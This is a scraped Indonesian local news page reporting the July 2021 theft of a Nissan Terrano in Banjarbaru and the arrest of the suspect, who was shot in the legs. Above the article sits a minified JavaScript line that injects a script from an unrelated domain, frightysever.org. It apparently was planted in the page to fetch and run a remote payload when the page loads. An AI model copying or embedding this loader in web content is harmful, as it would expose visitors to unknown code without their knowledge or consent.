(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
kriminal banjarbaru

Curi Mobil Nissan Terrano di Sungai Besar, MD Dibekuk di Sungkai dengan Tembakan


KANALKALIMANTAN.COM, BANJARBARU – Polsek Banjarbaru Kota mengungkap tindak pidana pencurian mobil yang sempat melarikan diri dan bersembunyi, akhirnya pelaku berhasil dibekuk dengan tangan mah panas Unit Buser Polsek Banjarbaru Kota.

Pelaku pencurian mobil berinisial MD (22), dibekuk setelah melakukan pencurian 1 unit mobil Nissan Terrano warna hitam nopol DA 7161 TZ. Korban melapor ke Polsek Banjarbaru Kota setelah mobil miliknya yang terparkir di depan rumah Jalan Pisces Raya, Komplek Bumi Cahaya Bintang, Kelurahan Sungai Besar, hilang pada Selasa 6 Juli 2021 sekitar pulul 04.00 Wita.

Kapolsek Banjarbaru Kota AKP Shofiyah SE MSi SIK saat press release di lobi Mapolsek Banjarbaru Kota mengatakan, Unit Buser melakukan penyelidikan berdasarkan rekaman cctv dan informasi keberadaan pelaku yang masih menggunakan mobil curian di desa Sungkai, Kecamatan Simpang Empat, Kabupaten Banjar.

 

 

Baca juga: Pelan Pelan Kita Mati, Lelucon Pahit Warga Miskin di Tengah PPKM Darurat

Pada saat akan dilakukan penangkapan pelaku berusaha kabur dan berusaha menabrakkan mobil curiannya ke petugas agar bisa melarikan diri, beruntung petugas berhasil menghindar, bahkan saat diamankan pelaku sempat mendorong petugas.

Akhirnya dengan tindakan tegas dan terukur pelaku dilumpuhkan dengan dua butir timah panas di kedua kakinya.

“Untuk pelaku dikenakan pasal 363 KUHP dengan ancaman 5 tahun penjara,” ucap AKP Shofiyah.

AKP Shofiyah juga menambahkan pelaku mencuri mobil tersebut hanya dengan menggunakan patahan sendok sebagai kunci palsu untuk menghidupkan mobil dan untuk diketahui pelaku merupakan resedivis dalam perkara pencurian.

Kapolsek Banjarbaru Kota AKP Shofiyah. Foto: shintia

Baca juga: Resep Tongseng Kambing: Bumbu, Bahan dan Cara Membuat

Pelaku cukup lihai dan berani melawan petugas ucap AKP Shofi, sehingga petugas melakukan tindakan tegas dan terukur dengan menembak kaki pelaku. “Pelaku beserta barang bukti mobil Nissa Terrano dan patahan sendok diamankan petugas guna proses lanjut,” tambah AKP Shofiyah.

Sementara itu, Kasi Humas Polsek Banjarbaru Kota Aipda Supri mengimbau kepada masyarakat untuk berhati-hati memarkirkan baik sepeda motor maupun mobil, karena modus pencurian sekarang lebih banyak dan terbilang nekat. “Alangkah baiknya juga untuk keamanan rumah bisa disertai pemasangan cctv untuk keamanan lingkungan sekitar kita,” ucapnya.

Selain itu Aipda Supri mengimbau kepada masyarakat untuk kembali mengaktifkan poskamling guna keamanan di lingkungam sekitar.
(kanalkalimantan.com/shintia)

Reporter : shintia
Editor : bie


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

9 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

10 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

11 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

12 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

16 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

18 jam ago

This website uses cookies.